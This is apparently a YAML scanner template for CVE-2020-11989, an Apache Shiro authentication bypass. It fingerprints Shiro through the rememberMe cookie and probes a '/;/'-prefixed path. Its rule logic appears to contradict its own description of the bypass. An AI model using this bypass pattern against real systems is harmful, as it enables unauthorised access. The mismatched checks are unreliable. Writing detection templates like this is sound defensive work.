id: CVE-2020-11989

info:
  name: shiro /;/ 身份认证绕过
  author: qwtd
  severity: medium
  verified: true
  description: |
    攻击者可以通过/;/拼接后台地址或已知接口达到绕过身份验证的效果访问接口的效果。

rules:
  r0:
    request:
      method: GET
      path: /
      follow_redirects: true
      headers:
        cookie: JSESSIONID={{randstr}};rememberMe=123;
    expression: response.raw_header.bcontains(b'rememberMe=deleteMe')
  r1:
    request:
      method: GET
      path: /
      headers:
        cookie: JSESSIONID={{randstr}};rememberMe=123;
    expression: response.raw_header.bcontains(b'rememberMe=deleteMe')
  r2:
    request:
      method: GET
      path: /slack_test
      follow_redirects: true
    expression: response.status == 200
  r3:
    request:
      method: GET
      path: /;/slack_test
      follow_redirects: true
    expression: response.status != 200
expression: (r0() || r1()) && r2() && r3()